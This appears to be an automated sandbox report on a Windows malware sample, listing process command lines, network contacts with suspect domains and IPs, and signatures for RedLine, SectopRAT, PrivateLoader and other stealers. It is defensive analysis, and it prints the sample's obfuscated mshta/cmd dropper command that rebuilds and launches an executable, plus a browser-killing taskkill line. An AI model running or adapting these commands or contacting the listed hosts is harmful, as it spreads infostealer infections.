"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE ( cREatEObjEcT ( "wscript.sHeLl" ). Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 , TruE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ECHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\msiexec.exe

msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc140ecc40,0x7ffc140ecc4c,0x7ffc140ecc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1920 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2152,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2120 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2204 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3076,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3096 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3120,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3240 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4524,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4484 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3684,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4720 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4540 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4988,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4976 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4660,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4364 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 67.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 marianu.xyz udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 www.listincode.com udp
US 54.205.158.59:443 www.listincode.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 niemannbest.me udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 propanla.com udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
US 52.203.72.196:443 www.listincode.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 s.lletlee.com udp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 telegatt.top udp
US 8.8.8.8:53 gcl-gb.biz udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 telegatt.top udp
US 8.8.8.8:53 gcl-gb.biz udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 www.iyiqian.com udp
US 8.8.8.8:53 t.gogamec.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 150.16.251.13.in-addr.arpa udp

Files

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240729-en

Max time kernel

148s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed096e68af113.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed094d15aaa9a48.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a48dab921a3bda7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0937c2dc68a2496.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed098e48a54663552b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0988d1c2bd9a37.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0RSAR.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0961d5d40c7b937c7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed096e68af113.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed096e68af113.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed094d15aaa9a48.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed098e48a54663552b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed098e48a54663552b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed094d15aaa9a48.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0937c2dc68a2496.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0937c2dc68a2496.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0961d5d40c7b937c7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0961d5d40c7b937c7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0RSAR.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0RSAR.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0RSAR.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0RSAR.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed096e68af113.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09c36f786070b6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed094d15aaa9a48.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed098e48a54663552b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0911cd5800a45.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0961d5d40c7b937c7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed0937c2dc68a2496.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09e3a07534aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a6fb1d0dd846.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-0RSAR.tmp\Wed09a6fb1d0dd846.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09f3b13c770637f.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-K6GVP.tmp\Wed09a6fb1d0dd846.tmp N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed094d15aaa9a48.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\Wed09a48dab921a3bda7.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1656 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe
PID 1656 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe
PID 1656 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe
PID 1656 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe
PID 1656 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe
PID 1656 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe
PID 1656 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe
PID 2808 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zS8763E087\setup_install.exe C:\Windows\SysWOW64\cmd.exe
